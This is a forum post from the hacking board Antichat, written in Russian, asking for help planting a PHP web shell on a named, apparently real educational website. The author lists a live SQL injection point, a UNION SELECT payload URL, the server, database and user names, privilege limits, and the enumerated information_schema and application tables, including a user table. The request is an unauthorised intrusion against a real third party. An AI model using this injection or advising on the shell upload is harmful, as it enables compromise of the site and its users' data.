ANTICHAT — форум по информационной безопасности, OSINT и технологиям

(модерам: не нашел тему о помощи - повесил пост в общем потоке. если что не так - исправте, пожалуйста)

Приветствую, атничатовцы!)

Такая проблема.

Есть сайт со скулей. Есть доступ к information_schema. Нашел выводимые поля => достал имена таблиц и имена полей. Осталось за малым - залить шелл (пых).

Проблемы: права USAGE, ко некотрымтабилцам нет доступа даже на SELECT, не могу залить шелл OUTFILE/DUMPFILE'ом, т.к нет прав FILE. =( Не могу добиться вывода шелла каким-нибудь энкодом символов (в выводимое поле), не выходит никак. Не могли бы помочь в этом деле? Может быть, какие-нибуь идейки? или решения? Буду очень благодарен.

Данные:

injection: ttp://hiik.ru/'/

выводимые поля: ttp://www.hiik.ru/1=1'%20union%20select%201,2,3%20--%20'3/

server: windows server 2003

***предположительно, всё болтается на IIS/PHP + какие-то перловские шаманства***

mysql_db: rasp

mysql_user: rasp

privilegies: USAGE (хотя, лучше всё равно всё рповерить)

доступ к information schema: ЕСТЬ

имена таблиц:

CHARACTER_SETS

COLLATIONS

COLLATION_CHARACTER_SET_APPLICABILITY

COLUMNS

COLUMN_PRIVILEGES

ENGINES

EVENTS

FILES

GLOBAL_STATUS

GLOBAL_VARIABLES

KEY_COLUMN_USAGE

PARTITIONS

PLUGINS

PROCESSLIST

PROFILING

REFERENTIAL_CONSTRAINTS

ROUTINES

SCHEMATA

SCHEMA_PRIVILEGES

SESSION_STATUS

SESSION_VARIABLES

STATISTICS

TABLES

TABLE_CONSTRAINTS

TABLE_PRIVILEGES

TRIGGERS

USER_PRIVILEGES

VIEWS

audit

den

doljn

fakult

forms

isprav

kabinet

kafedry

kol_zayav

kppk_data

kppk_glav_prog

kppk_kursy

kppk_predp

kppk_prepod

kppk_program

kppk_raspis

kppk_slush

kppk_soot

kppk_svod

mesto

nagruzka

news

para

podgot_kurs

podraz

predmet

prepod

raspis

site

spec

structur

tel

telef

tree_oplata11

type_zan

uch_plan

uch_rasp_ex

user

zvan